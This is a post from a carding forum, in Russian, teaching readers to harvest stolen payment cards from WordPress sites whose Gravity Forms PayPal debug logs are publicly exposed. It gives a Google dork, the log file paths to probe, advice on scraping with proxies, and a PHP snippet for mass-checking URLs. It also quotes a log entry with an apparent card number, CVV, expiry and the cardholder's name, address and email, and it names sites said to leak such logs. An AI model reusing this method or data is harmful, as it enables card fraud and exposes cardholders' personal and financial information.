Go Back   Carder.life > [ru] Forum for Russians > Спам, траффик, хостинг, web-дизайн
Reload this Page Поиск картона свои руками (2017)

CARDER.MARKET - CARDING FORUM FOR PROFESSIONAL CARDERS


 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old 02-24-2025, 09:38 PM
blackedd's Avatar

blackedd blackedd is offline
Join Date: Mar 2024
Posts: 146
Default

Привет ребятишки! И снова с вами MrROBOT!
Сегодня я покажу как можно добывать картон, метод абсолютно уникальный и неоткуда не слизанный. Дырочку я нашел довольно давно, но сегодня появилась нужна в СС и пришлось немного помозговать, чтобы запустить данный процесс. Я нашел небольшую ошибку в плагине WP под название gravity forms, данный скрипт многофункциональный. Это 0day который нигде не фигурировал на данный момент, другие баги конечно же в нем находили. Данный плагин использую для подключения оплаты на сайте и других фишек, подробнее можно почитать тут https://wordpress.org/plugins/gravity-forms-addons/
Как видим активных инсталлов +6000, что довольно не плохо. Дело в том, что в режиме дебага ведется лог где лежат картонки и другая информация холдера.
Пример записи:
Code:
DEBUG --> Payment in the amount of 200 was captured successfully.

DEBUG --> Capturing payment in the amount of 140.

DEBUG --> Sending request to PayPal - URL: https://payflowpro.paypal.com Request: VENDOR=1990NOFAS22&PARTNER=PayPal&PWD=Wartnikmunch  2016&USER=1990NOFAS22&BUTTONSOURCE=Rocketgenius_SP  &ACCT=5410658406967503&EXPDATE=1217&CVV2=572&STREE  T=681 B West Broadway&CITY=Granville&STATE=OH&ZIP=43023&BILLTOC  OUNTRY=US&CURRENCY=USD&FIRSTNAME=Nestor &LASTNAME=Matthews&[email protected]&DES  C=&L_NAME0=Custom Donation Amount&L_DESC0=Custom Donation Amount&L_AMT0=140&L_NUMBER0=1&L_QTY0=1&AMT=140&TEN  DER=C&TRXTYPE=S

2015-02-01 13:19:47 - DEBUG --> Response from PayPal: RESULT=0&PNREF=EREPBB81E4DE&RESPMSG=Approved&AUTHC  ODE=111111&AVSADDR=Y&AVSZIP=Y&CVV2MATCH=Y&PPREF=2B  N34309CX798431V&CORRELATIONID=66bca165ccde&IAVS=N

2015-02-01 13:19:47 - DEBUG --> Friendly view of response: Array

(

[RESULT] => 0

[PNREF] => EREPBB81E4DE

[RESPMSG] => Approved

[AUTHCODE] => 111111

[AVSADDR] => Y

[AVSZIP] => Y

[CVV2MATCH] => Y

[PPREF] => 2BN34309CX798431V

[CORRELATIONID] => 66bca165ccde

[IAVS] => N

)

Что мы тут видим?
1) ACCT=5410658406967503 - номер карты
2) EXPDATE=1217 - дата
3) CVV2=572 - без комментов
4) STREET=681 B West Broadway&CITY=Granville&STATE=OH&ZIP=43023&BILLTOC OUNTRY=US&CURRENCY=USD - полный адрес холдера
5) FIRSTNAME=Nestor &LASTNAME=Matthews - ФИО холдера
6) [email protected] - почту + в некоторых случая пасс от PayPal
Нам же этого хватит?
Поиск уязвимого скрипта:
Code:
inurl:/wp-content/uploads/gravity_forms/logs/

Тут мы сразу находит:
http://www.nofas.org/wp-content/uplo...aymentspro.txt
http://www.blackbeltsuccess.com/slas...spaypalpro.txt
Как видим в файликах gravityformspaypalpaymentspro.txt и gravityformspaypalpro.txt лежит лог по дебагу и куча картона со всеми необходимыми данными. Можете не стараться, он весь уже чекнутый и отработанный Если знакомы с настройками веб сервера, то поймете как такие вещи попали в Гугл. Тут не правильно настроены права доступа, именно по этому делаем вывод, что таких сайтов в 1000 раз больше и не все они проиндексировались Гугл.
Как же нам их найти?
1) Для начала нам нужно настроить парсер Гугла и выбрать все сайты WP по определенным запросам. Я приведу пару примеров, но свой список палить не буду.
Code:
store paypal inurl:/wp-content/

paypal inurl:/wp-content/

payment paypal inurl:/wp-content/

и т.д

2) Далее нам нужно будет собрать огромный список и чекнуть его на наличии дебаг лога. Наш скрипт должен ходить и проверять следующие вещи:
Code:
/wp-content/uploads/gravity_forms/logs/gravityformspaypalpro.txt

/wp-content/uploads/gravity_forms/logs/gravityformspaypalpaymentspro.txt

/wp-content/uploads/gravity_forms/logs/

3) После добычи массово чекаем картон.
Как это реализовать?
1) С парсером все просто, как оказалось есть бесплатный http://ascent.pro/ru/. Для его нормальной работы достаточно подключить антигейт или соксы.
У меня на дедике работает отлично!

2) После того как мы выбираем большое количество сайтов WP (предположительно с установленным плагином), нам нужно проверить наличия дебаг лога.
Для этого можно доработать скрип, все за вас писать не буду. По данной аналогие можно искать ЦЦ не только в этом плагине, но и много где еще!
Code:
function check_url($url)

{

  $url = preg_replace("/[^x20-xFF]/","",@strval($url));

  if (!strstr($url,"://"))

  {

  $url="http://".$url;

  }

  if (preg_match("/^(http://|https://)((www.|([w, -]+.))?([w, 

-]+.)(com|net|org|info|biz|spb.ru|msk.ru|com.ru|org.  

ru|net.ru|ru|su|us|bz|kz|ws|рф|pro))(|/.*)$/u", $url))

  {

  return $url;

  }

  return false;

}

function open_url($url)

{

$url_c=parse_url($url);

  if (!empty($url_c['host']) and checkdnsrr($url_c['host']))

  {

  // Ответ сервера

  if ($otvet=@get_headers($url)){

  return substr($otvet[0], 9, 3);

  }

  }

  return false;  

}

// Проверка ссылкок! Тут настраиваем забор в цикле из тхт или формы

$url='http://site.ru/wp-content/uploads/gravity_forms/logs/gravityformspaypalpaymentspro.txt';

if

 ($url=check_url($url))

{

  // ссылка корректная

  if ($o=open_url($url))

  {

  echo "Ответ сервера " . $o;

  }

  else

  {

  echo "Сервер не отвечает";

  }

}

else echo "Некорректная ссылка";

Я думаю логика поиска вам станет понята. Зачем платить за картон? Кода его можно найти!
Это авторская статья от MrROBOT!
 

Tags
NULL

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is On
Forum Jump




All times are GMT. The time now is 09:22 PM.

Contact Us - Carder.life - Archive - Top